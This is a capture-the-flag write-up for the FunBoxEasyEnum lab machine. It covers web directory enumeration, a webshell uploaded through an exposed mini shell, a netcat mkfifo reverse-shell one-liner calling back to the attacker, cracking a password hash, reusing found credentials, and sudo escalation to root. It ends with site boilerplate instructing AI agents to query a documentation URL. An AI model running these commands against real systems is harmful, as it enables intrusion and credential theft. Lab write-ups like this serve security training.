# FunBoxEasyEnum ## Nmap ``` sudo nmap 192.168.68.132 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information. ![](/files/-MY_yXxinUkPW9By8GL2) We now move onto enumerating with `dirsearch.py`. First running seclists big.txt against the target. ``` python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 ``` ![](/files/-MY_z9s4VVEMQnj87G1b) We view robots.txt and find it contains contains: ``` Allow: Enum_this_Box ``` I ran `dirsearch.py` against this and was unable to find anything further. Viewing `/phpmyadmin` and attempting to login with default credentials shows we are unable to proceed with the default root account. ![](/files/-MY_zNIY-sTYLxfiKSBn) Running dirsearch.py again on the target this time using the `--suffix` parameter to append .php to all entries we find `/mini.php`. ``` python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php ``` ![](/files/-MY_zhCQstXsNOBVzVWn) Browsing to `/mini.php` we come to Zerion Mini Shell 1.0. As per below I uploaded a webshell as webshell.php ![](/files/-MYa--NCV21ycnCrKLL3) Knowing that the above files exist in the root directory I then browsed to /webshell.php and was able to execute commands confirming we are running as www-data. ![](/files/-MYa-HPvRo4P5niF2WA8) Running the command `which nc` shows we have `netcat` installed on the target machine. I set up a `netcat` listener on my target machine then run the following command on the webshell: ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f ``` Resulting in a reverse shell. ![](/files/-MYa-xjRIuT7IZp2It9t) Upgrade the shell: ``` /usr/bin/script -qc /bin/bash /dev/null ``` Checking /etc/passwd shows the user 'oracle' has a password hash in the file. ![](/files/-MYa5TNrdyD0EqA8YOun) I then took the hash and run it under mode 500 on `Hashcat` on my Windows host which cracked the password as: **hiphop** ![](/files/-MYa5ki0g9RHkvIOG8s_) I then used `su` to switch to the user 'oracle' and was successful switching. ![](/files/-MYa68nZCXhWpCHM3BeW) After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users and no luck. I decided to move back onto www-data so I can read some files in /etc/phpmyadmin. I disconnected the shell and run the initial exploit on the web shell to get connect as www-data. Moving into `/etc/phpyadmin` and then reading read the config-db.php file we see credential information. ![](/files/-MYaBLByDDacy1JjDgMn) We find the credentials `phpmyadmin:tgbzhnujm!` I then logged in MySQL and was unable to identify interesting information in the contained databases. From here I starting throwing the passwords at the users in the `/home/` directory until I got a match on the user 'karla'. ![](/files/-MYaBoarKY3xIr3GCsoc) Knowing this worked I excited the shell and logged into `SSH` with the same information just so we have all the advantages of a `SSH` shell. ![](/files/-MYaC4DNmOStUKHxADlk) Checking `sudo -l` we see Karla can run any command as anyone. For a nice easy root shell we can run the command below: ``` sudo /bin/bash ``` ![](/files/-MYaCXPnKpoaM7DA7tGN) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/funboxeasyenum.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.